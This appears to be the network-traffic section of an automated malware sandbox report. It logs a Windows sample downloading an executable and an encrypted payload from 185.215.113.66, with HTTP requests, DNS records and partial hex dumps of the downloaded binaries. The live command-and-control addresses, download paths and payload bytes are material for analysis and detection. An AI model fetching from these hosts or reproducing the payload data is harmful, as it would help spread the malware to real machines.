Oct 28, 2024 11:11:33.024519920 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:33.024703026 CET | 49740 | 80 | 192.168.2.4 | 91.202.233.141
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 11:11:23.546010017 CET | 50345 | 40500 | 192.168.2.4 | 5.239.153.192
Oct 28, 2024 11:11:27.628107071 CET | 53 | 65131 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 11:11:28.559672117 CET | 50345 | 40500 | 192.168.2.4 | 5.75.95.114
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 28, 2024 11:11:23.587496042 CET | 1.1.1.1 | 192.168.2.4 | 0x22dd | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 11:11:23.587496042 CET | 1.1.1.1 | 192.168.2.4 | 0x22dd | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
• 185.215.113.66
• 91.202.233.141
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.66 | 80 | 6852 | C:\Users\user\Desktop\Bjl3geiFEK.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 11:11:11.845627069 CET | 282 | OUT | GET /tdrpl.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.215.113.66
Connection: Keep-Alive
Oct 28, 2024 11:11:12.754463911 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 28 Oct 2024 10:11:12 GMT
Content-Type: application/octet-stream
Content-Length: 85504
Last-Modified: Sun, 20 Oct 2024 18:13:32 GMT
Connection: keep-alive
ETag: "6715484c-14e00"
Accept-Ranges: bytes
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PELgp@y@p|0.text `.rdata?@@@.data.@2@
Oct 28, 2024 11:11:12.754487038 CET | 112 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j
Oct 28, 2024 11:11:12.754501104 CET | 1236 | IN | Data Raw: 00 8b f0 8b 47 04 89 06 66 8b 4f 02 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 c5 ce 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b
Data Ascii: GfOfNU Vu L$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$
Oct 28, 2024 11:11:12.754512072 CET | 1236 | IN | Data Raw: 6a 01 8d 54 24 28 52 6a 04 66 89 44 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11
Data Ascii: jT$(RjfD$D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFFFT$FWRP~;uF;vu]F[Ft;r+F][+n][W
Oct 28, 2024 11:11:12.754523993 CET | 1236 | IN | Data Raw: 3e 69 6c 63 69 75 07 8b c6 e8 00 03 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00
Data Ascii: >ilciu=4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA+r`tPf`uC PA4AD$CjP`A_^[]
Oct 28, 2024 11:11:12.754535913 CET | 1236 | IN | Data Raw: 24 18 89 44 24 08 8b 87 70 02 00 00 89 54 24 1c 8b 97 7c 02 00 00 8d 4c 24 08 51 89 44 24 18 8b 46 28 52 b9 02 00 00 00 8b d7 89 44 24 28 e8 57 f8 ff ff 83 c4 08 5f 5e 83 c4 1c c3 83 c6 14 56 ff 15 64 00 41 00 6a 04 8d 54 24 2c 52 b8 01 00 00 00
Data Ascii: $D$pT$|L$QD$F(RD$(W_^VdAjT$,RhfD$4`h3PufL$>A`QA`_^U- AVW|$jD$PGL$QT$ 3RPt$(t$ t$$L$;twSu*T$ RT$jD$ P
Oct 28, 2024 11:11:12.754548073 CET | 1236 | IN | Data Raw: 00 00 00 02 00 00 89 96 28 02 00 00 ff 15 fc 00 41 00 83 c7 3c 57 ff 15 5c 00 41 00 e8 35 fe ff ff 8b c6 5e 5b 5f 5d c3 56 e8 a8 87 00 00 83 c4 04 33 f6 55 e8 2d 91 00 00 83 c4 04 8b c6 5e 5b 5f 5d c3 cc cc cc 56 8b 74 24 08 85 f6 74 3a 81 3e 69
Data Ascii: (A<W\A5^[_]V3U-^[_]Vt$t:>ilciu2tu)|@P\AL$tx^^UQj%EjMUMAUBE]UQEM
Oct 28, 2024 11:11:12.754560947 CET | 1236 | IN | Data Raw: 8b 11 52 e8 fa 82 00 00 83 c4 04 8b 45 08 c7 00 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 8b 45 0c 25 ff ff 00 00 89 45 e4 8b 4d 0c c1 e9 10 81 e1 ff ff 00 00 89 4d ec 8b 55 10 81 e2 ff ff 00 00 89 55 fc 8b 45 10 c1
Data Ascii: RE]UE%EMMUUE%EMMUEEEMMMUUUE;EsEEMUMEEMUEM;UsEEMMUJEHM
Oct 28, 2024 11:11:12.754575968 CET | 672 | IN | Data Raw: eb 07 c7 45 fc 00 00 00 00 8b 4d f8 8b 55 08 8b 04 8a 8b 4d f8 8b 55 10 03 04 8a 8b 4d f8 8b 55 08 89 04 8a 8b 45 f8 8b 4d 08 8b 55 f8 8b 75 10 8b 04 81 3b 04 96 73 09 8b 4d fc 83 c1 01 89 4d fc eb 82 8b 45 fc 5e 8b e5 5d c3 cc cc cc 55 8b ec 83
Data Ascii: EMUMUMUEMUu;sMME^]UEEMMEUUE9EsMUEEEM;MUE<uMMUEEEEM;MU
Oct 28, 2024 11:11:12.755492926 CET | 1236 | IN | Data Raw: 00 00 00 80 c7 45 c8 00 00 00 00 eb 09 8b 55 c8 83 c2 01 89 55 c8 83 7d c8 20 73 1b 8b 45 fc 8b 4d 18 8b 54 81 fc 23 55 f4 74 02 eb 0a 8b 45 f4 d1 e8 89 45 f4 eb d6 8b 4d fc 51 8b 55 c8 52 8b 45 18 50 8b 4d 18 51 e8 d2 07 00 00 83 c4 10 89 45 f8
Data Ascii: EUU} sEMT#UtEEMQUREPMQEUUREPMQUREEEMMUUEE}EMMUUELMUELQUREPMQE}t=EUUELM
Oct 28, 2024 11:11:12.759903908 CET | 1236 | IN | Data Raw: ec c7 45 e0 00 00 00 00 8b 45 f4 83 c0 01 89 45 d0 eb 09 8b 4d d0 83 c1 01 89 4d d0 8b 55 d0 3b 55 dc 0f 83 25 01 00 00 8b 45 f4 8b 4d 0c 8b 14 81 52 8b 45 d0 8b 4d 0c 8b 14 81 52 8d 45 f8 50 e8 95 f3 ff ff 83 c4 0c 8b 4d f8 81 e1 00 00 00 80 f7
Data Ascii: EEEMMU;U%EMREMREPMMUUEEMMUUUEEEM;MsUUuEEMMMU;UsEEMMUEEMMUE;sMMu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 185.215.113.66 | 80 | 3060 | C:\Windows\sysppvrdnvs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 11:11:20.606060028 CET | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
Oct 28, 2024 11:11:21.512868881 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 28 Oct 2024 10:11:21 GMT
Content-Type: application/octet-stream
Content-Length: 110600
Last-Modified: Mon, 28 Oct 2024 09:35:17 GMT
Connection: keep-alive
ETag: "671f5ad5-1b008"
Accept-Ranges: bytes
Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 28, 2024 11:11:21.512989998 CET | 1236 | IN | Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
Oct 28, 2024 11:11:21.513026953 CET | 1236 | IN | Data Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
Oct 28, 2024 11:11:21.513062000 CET | 1236 | IN | Data Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
Oct 28, 2024 11:11:21.513096094 CET | 848 | IN | Data Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
Oct 28, 2024 11:11:21.513134003 CET | 1236 | IN | Data Raw: e5 c7 48 fe 8e a5 32 e2 13 dd d2 2d 64 e7 e9 5c 6b 43 03 19 ca a8 00 64 ff 18 b9 f1 9d 4d d7 74 8b a0 5f 02 8f 37 31 12 8f 13 05 52 05 c3 aa 57 33 76 99 c9 a7 4c 1d 6e ef 86 cd 0c eb a3 b1 70 2a 37 e3 66 ec 2b 49 77 ef cf bf ce fb 36 71 50 84 c7
Data Ascii: H2-d\kCdMt_71RW3vLnp*7f+Iw6qPRvW*fKA+SjAn3'>N.KD"A#1a"!(?$|%=e` 7ODu0Wn+NOayTvnB[4=}B!AS]v6jZD*&
Oct 28, 2024 11:11:21.513168097 CET | 1236 | IN | Data Raw: 2c ab a3 cb d3 d0 3b 48 ce 82 47 e8 01 6a cb db 94 a0 28 22 bb 49 f9 b3 d0 1e 4d 95 f8 48 88 81 e5 bc fb a8 de 10 1e 4d 86 3b 9d 22 c8 43 13 0a f6 0b 83 2a 40 3d 1e 6a 0b 90 01 d5 75 07 c4 a7 d8 73 9a 25 d4 87 54 8b 4f 20 f1 0b e3 71 55 5c 0c 60
Data Ascii: ,;HGj("IMHM;"C*@=jus%TO qU\`kqz(d];N_v3CM<k#Hd-_qoMx-Uy`r(4#f||ZL!eyhK?7IXih2%E
Oct 28, 2024 11:11:21.513204098 CET | 1236 | IN | Data Raw: b7 eb d5 25 e2 56 5b 0d aa 58 ee a9 24 96 78 02 b1 03 d9 37 5a 27 c7 fa ab 02 4f b7 77 b8 d6 61 8c 11 cc 35 fe dd fa 9c b3 17 68 68 79 58 d6 91 26 cb cf cc ff bc 31 bd d3 10 2f e7 12 fb 76 06 2e ea b6 26 10 d4 f3 20 fe 37 f6 ff 94 8c ba 34 7d 80
Data Ascii: %V[X$x7Z'Owa5hhyX&1/v.& 74}D~"}-TN.`"=aUNoPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t
Oct 28, 2024 11:11:21.513237953 CET | 1236 | IN | Data Raw: 50 9e cf ff d3 40 7a c7 f8 42 fe 25 37 4f 5d 4e ab 8b 92 d7 c2 30 99 d2 ab 7d 9c ac c4 aa 17 1d 59 5a 32 3a b1 48 b2 25 c1 ba 3e 25 fb b4 69 81 ab bd 29 75 ad b7 45 ea 4c e5 76 80 3b fa ec 7c 6f 7c 12 70 36 2d 91 1c 84 79 29 65 62 2a 42 9f 21 88
Data Ascii: P@zB%7O]N0}YZ2:H%>%i)uELv;|o|p6-y)eb*B!p;gaO)[4.W{6R,+*Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7V
Oct 28, 2024 11:11:21.513276100 CET | 1236 | IN | Data Raw: 21 ea 20 8a db 04 95 75 c8 3d 17 76 c0 08 a4 6f 07 b0 c6 ab c4 f1 d5 fe b5 93 98 79 2e 09 cd 11 59 84 3d 04 a7 f1 c0 a4 3b 1e 22 b5 76 35 21 a8 3d ea 56 08 b8 ef 53 61 0d 1f 5d 2b 7f 33 16 8e 38 8e 34 bb 28 13 f4 8f c0 71 68 6b f4 63 25 63 92 07
Data Ascii: ! u=voy.Y=;"v5!=VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP}u|C_/S0'n!C??&ol@ &d'C(!S"EYDXW
Oct 28, 2024 11:11:21.518661022 CET | 1236 | IN | Data Raw: d1 aa 3a 8f 5d c2 f2 31 d2 a0 d2 bb 0f 99 eb 94 1e 30 3c eb 7a b8 62 69 b4 5a 2c 8f 2e fb 1e 18 fa 28 dc 14 d4 cb 63 25 ac 74 b7 3a d6 9b 6f 04 e7 c2 7c 8b 2d f7 ea 3b 40 67 83 64 80 7c 71 df 88 2f 70 a1 a6 90 3f 78 8f 40 9c 12 94 75 f6 bd ef bf
Data Ascii: :]10<zbiZ,.(c%t:o|-;@gd|q/p?x@uvO=dN^|QHQ]JeUfH*O!$Ge!F7v.2He"5mjr=4O5n@a%"6pj$7yZJcXwx!QH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | 3060 | C:\Windows\sysppvrdnvs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 11:11:22.612062931 CET | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
Oct 28, 2024 11:11:23.515336037 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 28 Oct 2024 10:11:23 GMT
Content-Type: application/octet-stream
Content-Length: 110600
Last-Modified: Mon, 28 Oct 2024 09:35:17 GMT
Connection: keep-alive
ETag: "671f5ad5-1b008"
Accept-Ranges: bytes
Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 28, 2024 11:11:23.515369892 CET | 1236 | IN | Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
Oct 28, 2024 11:11:23.515388966 CET | 1236 | IN | Data Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
Oct 28, 2024 11:11:23.515410900 CET | 1236 | IN | Data Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
Oct 28, 2024 11:11:23.515428066 CET | 1236 | IN | Data Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
Oct 28, 2024 11:11:23.515445948 CET | 1236 | IN | Data Raw: 76 f8 eb 35 9a 49 f5 5f dc d3 37 59 0a e9 b8 e1 06 d3 e6 66 4b 04 7f 7b ee 03 3f 6a 27 e1 61 5e 8a b2 45 ed 6d b7 a8 9d 86 11 01 0f ff 78 01 fe 0d 80 ed c8 50 40 0b 73 80 eb b9 26 83 c3 d3 d3 ac 38 79 5a 41 ae 8b 77 07 a3 08 0e d9 8d 46 32 48 d1
Data Ascii: v5I_7YfK{?j'a^EmxP@s&8yZAwF2HPN.Tz=p7g8Zc4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=Yd
Oct 28, 2024 11:11:23.515465021 CET | 1236 | IN | Data Raw: c0 ba f9 08 b0 e4 da 68 51 42 b9 b5 09 39 34 51 01 40 fa 4b 87 b4 59 52 e7 f0 45 99 02 36 a3 10 c6 09 75 00 a8 1e 88 ea 1e bf 16 50 e8 c8 cb d1 d0 12 62 9d 5e 26 51 2e a2 08 8b 75 e4 14 c9 1c 8c ef 0a b7 18 83 88 9c 47 30 5e 57 34 38 ba b4 ac 95
Data Ascii: hQB94Q@KYRE6uPb^&Q.uG0^W48mh.z)|XV#%Y7myeXzOW075($Q?oXC(J7 L!Ce\_GMSqM#&@_(8@
Oct 28, 2024 11:11:23.515484095 CET | 1236 | IN | Data Raw: 7f e7 46 07 7b 45 ba 0f ee 7e d7 b8 cf a7 b1 02 ca aa 2a da f1 eb d7 1e 97 e4 5c 7d 47 49 81 f0 51 f0 4d f0 e5 ae 25 df c2 a8 ea 78 b4 2b de 24 76 83 e9 28 bd 6a c1 b9 99 9e 30 46 02 98 38 3e 82 1b 07 44 35 26 bd 09 6d 26 96 e4 dd f6 ed 1d 1a 17
Data Ascii: F{E~*\}GIQM%x+$v(j0F8>D5&m&qyAWS<Ie9^0#8-PKY#"3T>G(~/ldX5rO6fPtL[^8R~_RPc-#YM(N
Oct 28, 2024 11:11:23.515501022 CET | 1236 | IN | Data Raw: 16 a5 d7 7a 4f 72 44 d1 e5 fd 4c a1 5a 78 0d d5 0b 65 9d fb 99 7c 2e 09 41 89 22 b8 82 c5 5d b5 ac 48 1a 84 d6 88 67 fd 2d c8 67 95 39 24 53 4e 67 9b f4 d2 15 a3 b7 2b 23 3e 72 20 98 df fd 5a 19 cf dc e8 f4 fc 47 8d 9b f5 bf 2b c9 1d c2 d5 c2 74
Data Ascii: zOrDLZxe|.A"]Hg-g9$SNg+#>r ZG+t=DLIU^[YA]Fg&k~u)}{fQ_y\PfC\UcI%+15&tB5x`:Az?]Y@3y:`i_=E#|!4
                                                                                                                                  Oct 28, 2024 11:11:23.515521049 CET1236INData Raw: f4 c7 09 df ba 72 0b b8 b5 94 4a 02 0c 08 2b fe b2 29 61 ca 08 3d 62 b8 7f f8 78 a8 89 3c 6f e5 67 d8 ea 81 a9 4e 5e 3a 68 8c 06 23 ab 63 72 64 e4 e5 96 13 b0 ef 80 ff 6a 4b 68 f5 23 e2 00 18 28 5d f0 9e 1f 3a 94 62 1d c5 03 02 dc cc 42 d7 33 c2
                                                                                                                                  Data Ascii: rJ+)a=bx<ogN^:h#crdjKh#(]:bB3EM]9^>Ja[3Z&B,`ZcOq[W<!qk5/0.G`3qbj~'k7rYX{=-]K/&)o,d*)"g%?R. x>
                                                                                                                                  Oct 28, 2024 11:11:23.520992041 CET1120INData Raw: a2 83 16 9b b9 fb 69 9b ea 52 ae 0c 90 8f 67 91 6c 4a cf 7d 7e 4d 08 7b ee e4 4b d5 63 b5 a1 67 0f 45 2f a9 9e 1f 16 53 4d a3 96 9d f1 4f d9 40 e7 ae ac 34 a5 6d 1b 60 b6 4d 0b bb 23 1c 57 24 3e 92 e6 34 51 18 1c 76 0c 5f 27 63 a0 7f cb 9d b1 27
